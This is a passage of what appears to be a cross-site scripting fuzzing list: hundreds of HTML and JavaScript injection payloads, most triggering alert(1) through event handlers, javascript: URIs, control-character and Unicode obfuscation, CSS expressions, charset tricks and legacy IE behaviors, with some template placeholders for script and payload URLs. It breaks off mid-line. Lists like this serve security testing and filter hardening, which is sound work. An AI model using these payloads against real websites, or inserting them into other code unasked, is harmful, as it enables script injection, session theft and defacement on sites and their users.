onMouseLeave="javascript:javascript:alert(1)"></html onMouseLeave> +<html onMouseWheel html onMouseWheel="javascript:javascript:alert(1)"></html onMouseWheel> +<style onLoad style onLoad="javascript:javascript:alert(1)"></style onLoad> +<iframe onReadyStateChange iframe onReadyStateChange="javascript:javascript:alert(1)"></iframe onReadyStateChange> +<body onPageShow body onPageShow="javascript:javascript:alert(1)"></body onPageShow> +<style onReadyStateChange style onReadyStateChange="javascript:javascript:alert(1)"></style onReadyStateChange> +<frameset onFocus frameset onFocus="javascript:javascript:alert(1)"></frameset onFocus> +<applet onError applet onError="javascript:javascript:alert(1)"></applet onError> +<marquee onStart marquee onStart="javascript:javascript:alert(1)"></marquee onStart> +<script onLoad script onLoad="javascript:javascript:alert(1)"></script onLoad> +<html onMouseOver html onMouseOver="javascript:javascript:alert(1)"></html onMouseOver> +<html onMouseEnter html onMouseEnter="javascript:parent.javascript:alert(1)"></html onMouseEnter> +<body onBeforeUnload body onBeforeUnload="javascript:javascript:alert(1)"></body onBeforeUnload> +<html onMouseDown html onMouseDown="javascript:javascript:alert(1)"></html onMouseDown> +<marquee onScroll marquee onScroll="javascript:javascript:alert(1)"></marquee onScroll> +<xml onPropertyChange xml onPropertyChange="javascript:javascript:alert(1)"></xml onPropertyChange> +<frameset onBlur frameset onBlur="javascript:javascript:alert(1)"></frameset onBlur> +<applet onReadyStateChange applet onReadyStateChange="javascript:javascript:alert(1)"></applet onReadyStateChange> +<svg onUnload svg onUnload="javascript:javascript:alert(1)"></svg onUnload> +<html onMouseOut html onMouseOut="javascript:javascript:alert(1)"></html onMouseOut> +<body onMouseMove body onMouseMove="javascript:javascript:alert(1)"></body onMouseMove> +<body onResize body onResize="javascript:javascript:alert(1)"></body onResize> +<object onError object onError="javascript:javascript:alert(1)"></object onError> +<body onPopState body onPopState="javascript:javascript:alert(1)"></body onPopState> +<html onMouseMove html onMouseMove="javascript:javascript:alert(1)"></html onMouseMove> +<applet onreadystatechange applet onreadystatechange="javascript:javascript:alert(1)"></applet onreadystatechange> +<body onpagehide body onpagehide="javascript:javascript:alert(1)"></body onpagehide> +<svg onunload svg onunload="javascript:javascript:alert(1)"></svg onunload> +<applet onerror applet onerror="javascript:javascript:alert(1)"></applet onerror> +<body onkeyup body onkeyup="javascript:javascript:alert(1)"></body onkeyup> +<body onunload body onunload="javascript:javascript:alert(1)"></body onunload> +<iframe onload iframe onload="javascript:javascript:alert(1)"></iframe onload> +<body onload body onload="javascript:javascript:alert(1)"></body onload> +<html onmouseover html onmouseover="javascript:javascript:alert(1)"></html onmouseover> +<object onbeforeload object onbeforeload="javascript:javascript:alert(1)"></object onbeforeload> +<body onbeforeunload body onbeforeunload="javascript:javascript:alert(1)"></body onbeforeunload> +<body onfocus body onfocus="javascript:javascript:alert(1)"></body onfocus> +<body onkeydown body onkeydown="javascript:javascript:alert(1)"></body onkeydown> +<iframe onbeforeload iframe onbeforeload="javascript:javascript:alert(1)"></iframe onbeforeload> +<iframe src iframe src="javascript:javascript:alert(1)"></iframe src> +<svg onload svg onload="javascript:javascript:alert(1)"></svg onload> +<html onmousemove html onmousemove="javascript:javascript:alert(1)"></html onmousemove> +<body onblur body onblur="javascript:javascript:alert(1)"></body onblur> +\x3Cscript>javascript:alert(1)</script> +'"`><script>/* *\x2Fjavascript:alert(1)// */</script> +<script>javascript:alert(1)</script\x0D +<script>javascript:alert(1)</script\x0A +<script>javascript:alert(1)</script\x0B +<script charset="\x22>javascript:alert(1)</script> +<!--\x3E<img src=xxx:x onerror=javascript:alert(1)> --> +--><!-- ---> <img src=xxx:x onerror=javascript:alert(1)> --> +--><!-- --\x00> <img src=xxx:x onerror=javascript:alert(1)> --> +--><!-- --\x21> <img src=xxx:x onerror=javascript:alert(1)> --> +--><!-- --\x3E> <img src=xxx:x onerror=javascript:alert(1)> --> +`"'><img src='#\x27 onerror=javascript:alert(1)> +<a href="javascript\x3Ajavascript:alert(1)" id="fuzzelement1">test</a> +"'`><p><svg><script>a='hello\x27;javascript:alert(1)//';</script></p> +<a href="javas\x00cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x07cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x0Dcript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x0Acript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x08cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x02cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x03cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x04cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x01cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x05cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x0Bcript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x09cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x06cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x0Ccript:javascript:alert(1)" id="fuzzelement1">test</a> +<script>/* *\x2A/javascript:alert(1)// */</script> +<script>/* *\x00/javascript:alert(1)// */</script> +<style></style\x3E<img src="about:blank" onerror=javascript:alert(1)//></style> +<style></style\x0D<img src="about:blank" onerror=javascript:alert(1)//></style> +<style></style\x09<img src="about:blank" onerror=javascript:alert(1)//></style> +<style></style\x20<img src="about:blank" onerror=javascript:alert(1)//></style> +<style></style\x0A<img src="about:blank" onerror=javascript:alert(1)//></style> +"'`>ABC<div style="font-family:'foo'\x7Dx:expression(javascript:alert(1);/*';">DEF +"'`>ABC<div style="font-family:'foo'\x3Bx:expression(javascript:alert(1);/*';">DEF +<script>if("x\\xE1\x96\x89".length==2) { javascript:alert(1);}</script> +<script>if("x\\xE0\xB9\x92".length==2) { javascript:alert(1);}</script> +<script>if("x\\xEE\xA9\x93".length==2) { javascript:alert(1);}</script> +'`"><\x3Cscript>javascript:alert(1)</script> +'`"><\x00script>javascript:alert(1)</script> +"'`><\x3Cimg src=xxx:x onerror=javascript:alert(1)> +"'`><\x00img src=xxx:x onerror=javascript:alert(1)> +<script src="data:text/plain\x2Cjavascript:alert(1)"></script> +<script src="data:\xD4\x8F,javascript:alert(1)"></script> +<script src="data:\xE0\xA4\x98,javascript:alert(1)"></script> +<script src="data:\xCB\x8F,javascript:alert(1)"></script> +<script\x20type="text/javascript">javascript:alert(1);</script> +<script\x3Etype="text/javascript">javascript:alert(1);</script> +<script\x0Dtype="text/javascript">javascript:alert(1);</script> +<script\x09type="text/javascript">javascript:alert(1);</script> +<script\x0Ctype="text/javascript">javascript:alert(1);</script> +<script\x2Ftype="text/javascript">javascript:alert(1);</script> +<script\x0Atype="text/javascript">javascript:alert(1);</script> +ABC<div style="x\x3Aexpression(javascript:alert(1)">DEF +ABC<div style="x:expression\x5C(javascript:alert(1)">DEF +ABC<div style="x:expression\x00(javascript:alert(1)">DEF +ABC<div style="x:exp\x00ression(javascript:alert(1)">DEF +ABC<div style="x:exp\x5Cression(javascript:alert(1)">DEF +ABC<div style="x:\x0Aexpression(javascript:alert(1)">DEF +ABC<div style="x:\x09expression(javascript:alert(1)">DEF +ABC<div style="x:\xE3\x80\x80expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x84expression(javascript:alert(1)">DEF +ABC<div style="x:\xC2\xA0expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x80expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x8Aexpression(javascript:alert(1)">DEF +ABC<div style="x:\x0Dexpression(javascript:alert(1)">DEF +ABC<div style="x:\x0Cexpression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x87expression(javascript:alert(1)">DEF +ABC<div style="x:\xEF\xBB\xBFexpression(javascript:alert(1)">DEF +ABC<div style="x:\x20expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x88expression(javascript:alert(1)">DEF +ABC<div style="x:\x00expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x8Bexpression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x86expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x85expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x82expression(javascript:alert(1)">DEF +ABC<div style="x:\x0Bexpression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x81expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x83expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x89expression(javascript:alert(1)">DEF +<a href="\x0Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x0Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xC2\xA0javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x05javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE1\xA0\x8Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x18javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x11javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x88javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x89javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x17javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x03javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x0Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x00javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x10javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x82javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x20javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x13javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x09javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x8Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x14javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x19javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\xAFjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x81javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Djavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x87javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x07javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE1\x9A\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x83javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x04javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x01javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x08javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x84javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x86javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE3\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x12javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x0Djavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x0Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x0Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x15javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\xA8javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x16javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x02javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x06javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\xA9javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x85javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x81\x9Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javascript\x00:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javascript\x3A:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javascript\x09:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javascript\x0D:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javascript\x0A:javascript:alert(1)" id="fuzzelement1">test</a> +`"'><img src=xxx:x \x0Aonerror=javascript:alert(1)> +`"'><img src=xxx:x \x22onerror=javascript:alert(1)> +`"'><img src=xxx:x \x0Bonerror=javascript:alert(1)> +`"'><img src=xxx:x \x0Donerror=javascript:alert(1)> +`"'><img src=xxx:x \x2Fonerror=javascript:alert(1)> +`"'><img src=xxx:x \x09onerror=javascript:alert(1)> +`"'><img src=xxx:x \x0Conerror=javascript:alert(1)> +`"'><img src=xxx:x \x00onerror=javascript:alert(1)> +`"'><img src=xxx:x \x27onerror=javascript:alert(1)> +`"'><img src=xxx:x \x20onerror=javascript:alert(1)> +"`'><script>\x3Bjavascript:alert(1)</script> +"`'><script>\x0Djavascript:alert(1)</script> +"`'><script>\xEF\xBB\xBFjavascript:alert(1)</script> +"`'><script>\xE2\x80\x81javascript:alert(1)</script> +"`'><script>\xE2\x80\x84javascript:alert(1)</script> +"`'><script>\xE3\x80\x80javascript:alert(1)</script> +"`'><script>\x09javascript:alert(1)</script> +"`'><script>\xE2\x80\x89javascript:alert(1)</script> +"`'><script>\xE2\x80\x85javascript:alert(1)</script> +"`'><script>\xE2\x80\x88javascript:alert(1)</script> +"`'><script>\x00javascript:alert(1)</script> +"`'><script>\xE2\x80\xA8javascript:alert(1)</script> +"`'><script>\xE2\x80\x8Ajavascript:alert(1)</script> +"`'><script>\xE1\x9A\x80javascript:alert(1)</script> +"`'><script>\x0Cjavascript:alert(1)</script> +"`'><script>\x2Bjavascript:alert(1)</script> +"`'><script>\xF0\x90\x96\x9Ajavascript:alert(1)</script> +"`'><script>-javascript:alert(1)</script> +"`'><script>\x0Ajavascript:alert(1)</script> +"`'><script>\xE2\x80\xAFjavascript:alert(1)</script> +"`'><script>\x7Ejavascript:alert(1)</script> +"`'><script>\xE2\x80\x87javascript:alert(1)</script> +"`'><script>\xE2\x81\x9Fjavascript:alert(1)</script> +"`'><script>\xE2\x80\xA9javascript:alert(1)</script> +"`'><script>\xC2\x85javascript:alert(1)</script> +"`'><script>\xEF\xBF\xAEjavascript:alert(1)</script> +"`'><script>\xE2\x80\x83javascript:alert(1)</script> +"`'><script>\xE2\x80\x8Bjavascript:alert(1)</script> +"`'><script>\xEF\xBF\xBEjavascript:alert(1)</script> +"`'><script>\xE2\x80\x80javascript:alert(1)</script> +"`'><script>\x21javascript:alert(1)</script> +"`'><script>\xE2\x80\x82javascript:alert(1)</script> +"`'><script>\xE2\x80\x86javascript:alert(1)</script> +"`'><script>\xE1\xA0\x8Ejavascript:alert(1)</script> +"`'><script>\x0Bjavascript:alert(1)</script> +"`'><script>\x20javascript:alert(1)</script> +"`'><script>\xC2\xA0javascript:alert(1)</script> +"/><img/onerror=\x0Bjavascript:alert(1)\x0Bsrc=xxx:x /> +"/><img/onerror=\x22javascript:alert(1)\x22src=xxx:x /> +"/><img/onerror=\x09javascript:alert(1)\x09src=xxx:x /> +"/><img/onerror=\x27javascript:alert(1)\x27src=xxx:x /> +"/><img/onerror=\x0Ajavascript:alert(1)\x0Asrc=xxx:x /> +"/><img/onerror=\x0Cjavascript:alert(1)\x0Csrc=xxx:x /> +"/><img/onerror=\x0Djavascript:alert(1)\x0Dsrc=xxx:x /> +"/><img/onerror=\x60javascript:alert(1)\x60src=xxx:x /> +"/><img/onerror=\x20javascript:alert(1)\x20src=xxx:x /> +<script\x2F>javascript:alert(1)</script> +<script\x20>javascript:alert(1)</script> +<script\x0D>javascript:alert(1)</script> +<script\x0A>javascript:alert(1)</script> +<script\x0C>javascript:alert(1)</script> +<script\x00>javascript:alert(1)</script> +<script\x09>javascript:alert(1)</script> +`"'><img src=xxx:x onerror\x0B=javascript:alert(1)> +`"'><img src=xxx:x onerror\x00=javascript:alert(1)> +`"'><img src=xxx:x onerror\x0C=javascript:alert(1)> +`"'><img src=xxx:x onerror\x0D=javascript:alert(1)> +`"'><img src=xxx:x onerror\x20=javascript:alert(1)> +`"'><img src=xxx:x onerror\x0A=javascript:alert(1)> +`"'><img src=xxx:x onerror\x09=javascript:alert(1)> +<script>javascript:alert(1)<\x00/script> +<img src=# onerror\x3D"javascript:alert(1)" > +<input onfocus=javascript:alert(1) autofocus> +<input onblur=javascript:alert(1) autofocus><input autofocus> +<video poster=javascript:javascript:alert(1)// +<body onscroll=javascript:alert(1)><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><input autofocus> +<form id=test onforminput=javascript:alert(1)><input></form><button form=test onformchange=javascript:alert(1)>X +<video><source onerror="javascript:javascript:alert(1)"> +<video onerror="javascript:javascript:alert(1)"><source> +<form><button formaction="javascript:javascript:alert(1)">X +<body oninput=javascript:alert(1)><input autofocus> +<math href="javascript:javascript:alert(1)">CLICKME</math> <math> <maction actiontype="statusline#http://google.com" xlink:href="javascript:javascript:alert(1)">CLICKME</maction> </math> +<frameset onload=javascript:alert(1)> +<table background="javascript:javascript:alert(1)"> +<!--<img src="--><img src=x onerror=javascript:alert(1)//"> +<comment><img src="</comment><img src=x onerror=javascript:alert(1))//"> +<![><img src="]><img src=x onerror=javascript:alert(1)//"> +<style><img src="</style><img src=x onerror=javascript:alert(1)//"> +<li style=list-style:url() onerror=javascript:alert(1)> <div style=content:url(data:image/svg+xml,%%3Csvg/%%3E);visibility:hidden onload=javascript:alert(1)></div> +<head><base href="javascript://"></head><body><a href="/. /,javascript:alert(1)//#">XXX</a></body> +<SCRIPT FOR=document EVENT=onreadystatechange>javascript:alert(1)</SCRIPT> +<OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(1)"></OBJECT> +<object data="data:text/html;base64,%(base64)s"> +<embed src="data:text/html;base64,%(base64)s"> +<b <script>alert(1)</script>0 +<div id="div1"><input value="``onmouseover=javascript:alert(1)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script> +<x '="foo"><x foo='><img src=x onerror=javascript:alert(1)//'> +<embed src="javascript:alert(1)"> +<img src="javascript:alert(1)"> +<image src="javascript:alert(1)"> +<script src="javascript:alert(1)"> +<div style=width:1px;filter:glow onfilterchange=javascript:alert(1)>x +<? foo="><script>javascript:alert(1)</script>"> +<! foo="><script>javascript:alert(1)</script>"> +</ foo="><script>javascript:alert(1)</script>"> +<? foo="><x foo='?><script>javascript:alert(1)</script>'>"> +<! foo="[[[Inception]]"><x foo="]foo><script>javascript:alert(1)</script>"> +<% foo><x foo="%><script>javascript:alert(1)</script>"> +<div id=d><x xmlns="><iframe onload=javascript:alert(1)"></div> <script>d.innerHTML=d.innerHTML</script> +<img \x00src=x onerror="alert(1)"> +<img \x47src=x onerror="javascript:alert(1)"> +<img \x11src=x onerror="javascript:alert(1)"> +<img \x12src=x onerror="javascript:alert(1)"> +<img\x47src=x onerror="javascript:alert(1)"> +<img\x10src=x onerror="javascript:alert(1)"> +<img\x13src=x onerror="javascript:alert(1)"> +<img\x32src=x onerror="javascript:alert(1)"> +<img\x47src=x onerror="javascript:alert(1)"> +<img\x11src=x onerror="javascript:alert(1)"> +<img \x47src=x onerror="javascript:alert(1)"> +<img \x34src=x onerror="javascript:alert(1)"> +<img \x39src=x onerror="javascript:alert(1)"> +<img \x00src=x onerror="javascript:alert(1)"> +<img src\x09=x onerror="javascript:alert(1)"> +<img src\x10=x onerror="javascript:alert(1)"> +<img src\x13=x onerror="javascript:alert(1)"> +<img src\x32=x onerror="javascript:alert(1)"> +<img src\x12=x onerror="javascript:alert(1)"> +<img src\x11=x onerror="javascript:alert(1)"> +<img src\x00=x onerror="javascript:alert(1)"> +<img src\x47=x onerror="javascript:alert(1)"> +<img src=x\x09onerror="javascript:alert(1)"> +<img src=x\x10onerror="javascript:alert(1)"> +<img src=x\x11onerror="javascript:alert(1)"> +<img src=x\x12onerror="javascript:alert(1)"> +<img src=x\x13onerror="javascript:alert(1)"> +<img[a][b][c]src[d]=x[e]onerror=[f]"alert(1)"> +<img src=x onerror=\x09"javascript:alert(1)"> +<img src=x onerror=\x10"javascript:alert(1)"> +<img src=x onerror=\x11"javascript:alert(1)"> +<img src=x onerror=\x12"javascript:alert(1)"> +<img src=x onerror=\x32"javascript:alert(1)"> +<img src=x onerror=\x00"javascript:alert(1)"> +<a href=java&#1&#2&#3&#4&#5&#6&#7&#8&#11&#12script:javascript:alert(1)>XXX</a> +<img src="x` `<script>javascript:alert(1)</script>"` `> +<img src onerror /" '"= alt=javascript:alert(1)//"> +<title onpropertychange=javascript:alert(1)></title><title title=> +<a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=javascript:alert(1)></a>"> +<!--[if]><script>javascript:alert(1)</script --> +<!--[if<img src=x onerror=javascript:alert(1)//]> --> +<script src="/\%(jscript)s"></script> +<script src="\\%(jscript)s"></script> +<object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object> <object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" onqt_error="javascript:alert(1)" style="behavior:url(#x);"><param name=postdomevents /></object> +<a style="-o-link:'javascript:javascript:alert(1)';-o-link-source:current">X +<style>p[foo=bar{}*{-o-link:'javascript:javascript:alert(1)'}{}*{-o-link-source:current}]{color:red};</style> +<link rel=stylesheet href=data:,*%7bx:expression(javascript:alert(1))%7d +<style>@import "data:,*%7bx:expression(javascript:alert(1))%7D";</style> +<a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="javascript:alert(1);">XXX</a></a><a href="javascript:javascript:alert(1)">XXX</a> +<style>*[{}@import'%(css)s?]</style>X +<div style="font-family:'foo&#10;;color:red;';">XXX +<div style="font-family:foo}color=red;">XXX +<// style=x:expression\28javascript:alert(1)\29> +<style>*{x:expression(javascript:alert(1))}</style> +<div style=content:url(%(svg)s)></div> +<div style="list-style:url(http://foo.f)\20url(javascript:javascript:alert(1));">X +<div id=d><div style="font-family:'sans\27\3B color\3Ared\3B'">X</div></div> <script>with(document.getElementById("d"))innerHTML=innerHTML</script> +<div style="background:url(/f#&#127;oo/;color:red/*/foo.jpg);">X +<div style="font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X +<div id="x">XXX</div> <style> #x{font-family:foo[bar;color:green;} #y];color:red;{} </style> +<x style="background:url('x&#1;;color:red;/*')">XXX</x> +<script>({set/**/$($){_/**/setter=$,_=javascript:alert(1)}}).$=eval</script> +<script>({0:#0=eval/#0#/#0#(javascript:alert(1))})</script> +<script>ReferenceError.prototype.__defineGetter__('name', function(){javascript:alert(1)}),x</script> +<script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('javascript:alert(1)')()</script> +<meta charset="x-imap4-modified-utf7">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi +<meta charset="x-imap4-modified-utf7">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&> +<meta charset="mac-farsi">¼script¾javascript:alert(1)¼/script¾ +X<x style=`behavior:url(#default#time2)` onbegin=`javascript:alert(1)` > +1<set/xmlns=`urn:schemas-microsoft-com:time` style=`beh&#x41vior:url(#default#time2)` attributename=`innerhtml` to=`&lt;img/src=&quot;x&quot;onerror=javascript:alert(1)&gt;`> +1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=&lt;img/src=&quot;.&quot;onerror=javascript:alert(1)&gt;> +<vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%;height:100% src=%(vml)s#xss></vmlframe> +1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:javascript:alert(1) strokecolor=white strokeweight=1000px from=0 to=1000 /></a> +<a style="behavior:url(#default#AnchorClick);" folder="javascript:javascript:alert(1)">XXX</a> +<x style="behavior:url(%(sct)s)"> +<xml id="xss" src="%(htc)s"></xml> <label dataformatas="html" datasrc="#xss" datafld="payload"></label> +<event-source src="%(event)s" onload="javascript:alert(1)"> +<a href="javascript:javascript:alert(1)"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A"> +<div id="x">x</div> <xml:namespace prefix="t"> <import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" targetElement="x" to="&lt;img&#11;src=x:x&#11;onerror&#11;=javascript:alert(1)&gt;"> +<script>%(payload)s</script> +<script src=%(jscript)s></script> +<script language='javascript' src='%(jscript)s'></script> +<script>javascript:alert(1)</script> +<IMG SRC="javascript:javascript:alert(1);"> +<IMG SRC=javascript:javascript:alert(1)> +<IMG SRC=`javascript:javascript:alert(1)`> +<SCRIPT SRC=%(jscript)s?<B> +<FRAMESET><FRAME SRC="javascript:javascript:alert(1);"></FRAMESET> +<BODY ONLOAD=javascript:alert(1)> +<BODY ONLOAD=javascript:javascript:alert(1)> +<IMG SRC="jav ascript:javascript:alert(1);"> +<BODY onload!#$%%&()*~+-_.,:;?@[/|\]^`=javascript:alert(1)> +<SCRIPT/SRC="%(jscript)s"></SCRIPT> +<<SCRIPT>%(payload)s//<</SCRIPT> +<IMG SRC="javascript:javascript:alert(1)" +<iframe src=%(scriptlet)s < +<INPUT TYPE="IMAGE" SRC="javascript:javascript:alert(1);"> +<IMG DYNSRC="javascript:javascript:alert(1)"> +<IMG LOWSRC="javascript:javascript:alert(1)"> +<BGSOUND SRC="javascript:javascript:alert(1);"> +<BR SIZE="&{javascript:alert(1)}"> +<LAYER SRC="%(scriptlet)s"></LAYER> +<LINK REL="stylesheet" HREF="javascript:javascript:alert(1);"> +<STYLE>@import'%(css)s';</STYLE> +<META HTTP-EQUIV="Link" Content="<%(css)s>; REL=stylesheet"> +<XSS STYLE="behavior: url(%(htc)s);"> +<STYLE>li {list-style-image: url("javascript:javascript:alert(1)");}</STYLE><UL><LI>XSS +<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:javascript:alert(1);"> +<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:javascript:alert(1);"> +<IFRAME SRC="javascript:javascript:alert(1);"></IFRAME> +<TABLE BACKGROUND="javascript:javascript:alert(1)"> +<TABLE><TD BACKGROUND="javascript:javascript:alert(1)"> +<DIV STYLE="background-image: url(javascript:javascript:alert(1))"> +<DIV STYLE="width:expression(javascript:alert(1));"> +<IMG STYLE="xss:expr/*XSS*/ession(javascript:alert(1))"> +<XSS STYLE="xss:expression(javascript:alert(1))"> +<STYLE TYPE="text/javascript">javascript:alert(1);</STYLE> +<STYLE>.XSS{background-image:url("javascript:javascript:alert(1)");}</STYLE><A CLASS=XSS></A> +<STYLE type="text/css">BODY{background:url("javascript:javascript:alert(1)")}</STYLE> +<!--[if gte IE 4]><SCRIPT>javascript:alert(1);</SCRIPT><![endif]--> +<BASE HREF="javascript:javascript:alert(1);//"> +<OBJECT TYPE="text/x-scriptlet" DATA="%(scriptlet)s"></OBJECT> +<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:javascript:alert(1)></OBJECT> +<HTML xmlns:xss><?import namespace="xss" implementation="%(htc)s"><xss:xss>XSS</xss:xss></HTML>""","XML namespace."),("""<XML ID="xss"><I><B>&lt;IMG SRC="javas<!-- -->cript:javascript:alert(1)"&gt;</B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN> +<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS&lt;SCRIPT DEFER&gt;javascript:alert(1)&lt;/SCRIPT&gt;"></BODY></HTML> +<SCRIPT SRC="%(jpg)s"></SCRIPT> +<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-%(payload)s;+ADw-/SCRIPT+AD4- +<form id="test" /><button form="test" formaction="javascript:javascript:alert(1)">X +<body onscroll=javascript:alert(1)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus> +<P STYLE="behavior:url('#default#time2')" end="0" onEnd="javascript:alert(1)"> +<STYLE>@import'%(css)s';</STYLE> +<STYLE>a{background:url('s1' 's2)}@import javascript:javascript:alert(1);');}</STYLE> +<meta charset= "x-imap4-modified-utf7"&&>&&<script&&>javascript:alert(1)&&;&&<&&/script&&> +<SCRIPT 